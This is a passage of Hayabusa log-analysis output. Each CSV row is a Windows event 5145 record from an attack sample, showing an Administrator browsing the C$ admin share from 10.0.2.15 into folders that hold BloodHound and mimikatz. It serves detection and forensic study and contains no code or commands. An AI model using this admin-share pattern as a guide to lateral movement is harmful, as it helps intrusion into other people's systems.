Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.469 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.469 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.479 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.479 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.499 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.499 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 